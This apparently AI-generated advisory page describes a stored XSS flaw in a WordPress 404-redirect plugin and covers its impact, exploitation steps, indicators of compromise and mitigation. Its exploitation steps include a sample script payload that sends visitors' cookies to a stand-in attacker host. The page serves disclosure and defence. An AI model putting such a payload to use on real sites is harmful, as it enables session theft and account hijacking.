CVE-2025-12037: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-12037 is a Stored Cross-Site Scripting (XSS) vulnerability in the WP 404 Auto Redirect to Similar Post plugin for WordPress. It affects all versions up to and including 1.0.5, stemming from insufficient input sanitization and output escaping in admin settings. The vulnerability requires administrator-level authentication and is only exploitable in multi-site WordPress installations or where unfiltered_html has been disabled. It carries a CVSS v3.1 base score of 4.4 (Medium) and was published on February 18, 2026 (Red Hat CVE).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). An authenticated attacker with administrator-level privileges can inject arbitrary JavaScript into plugin admin settings fields, which are then stored in the database and rendered without proper escaping when a user visits an affected page. Exploitation requires high privileges (administrator) and a specific environment (multi-site or unfiltered_html disabled), making the attack complexity high. A technical write-up is available at Infinit Security (Infinit Security).

Impact

Successful exploitation allows an authenticated administrator to persistently inject malicious scripts into WordPress pages, which execute in the browsers of any user who visits those pages. The primary impacts are low-level confidentiality loss (e.g., session token theft) and low-level integrity compromise (e.g., page content manipulation), with no direct availability impact. The scope is changed, meaning the injected scripts can affect users beyond the attacker's own session, potentially enabling account hijacking or phishing within the affected WordPress site (Red Hat CVE).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-12037. The EPSS score is approximately 0.022% (0.000220), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for administrator-level credentials and a specific WordPress configuration (multi-site or unfiltered_html disabled) (Red Hat CVE).

Exploitation steps

  1. Reconnaissance: Identify a WordPress multi-site installation or a site with unfiltered_html disabled that is running the WP 404 Auto Redirect to Similar Post plugin version ≤ 1.0.5.
  2. Obtain Administrator Access: Gain administrator-level credentials through phishing, credential stuffing, or another means — this vulnerability requires high-privilege access.
  3. Navigate to Plugin Settings: Log in to the WordPress admin dashboard and navigate to the WP 404 Auto Redirect to Similar Post plugin settings page.
  4. Inject Malicious Payload: Enter a crafted XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable admin settings field that lacks proper sanitization.
  5. Save Settings: Submit the form to store the malicious script in the WordPress database.
  6. Trigger Execution: When any user (including other admins or site visitors) accesses a page that renders the injected setting, the malicious script executes in their browser, potentially stealing session cookies or performing actions on their behalf (Infinit Security).

Indicators of compromise

  • Logs: WordPress admin audit logs showing unexpected changes to WP 404 Auto Redirect to Similar Post plugin settings by an administrator account, especially from unusual IP addresses or at unusual times.
  • Database: Presence of <script> tags or JavaScript event handlers (e.g., onerror, onload) in the plugin's settings rows within the wp_options table.
  • Network: Outbound requests from user browsers to unknown external domains originating from WordPress page loads, potentially carrying cookie or session data in query parameters.
  • File System: No direct file system artifacts expected for stored XSS, but review plugin configuration files for unexpected modifications.

Mitigation and workarounds

Users should update the WP 404 Auto Redirect to Similar Post plugin to a version beyond 1.0.5 that includes the fix for insufficient input sanitization and output escaping. As a workaround, site administrators can restrict access to the plugin's settings page to trusted accounts only, or temporarily disable the plugin until a patched version is available. Enabling unfiltered_html restrictions (already a prerequisite for exploitation) and enforcing strong administrator account security (MFA, strong passwords) further reduces risk (Red Hat CVE).

Community reactions

Coverage of CVE-2025-12037 has been limited to vulnerability database aggregators and a brief technical post from Infinit Security. No notable vendor statements, researcher commentary, or significant social media discussion has been identified beyond standard CVE publication and tracking (Infinit Security).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management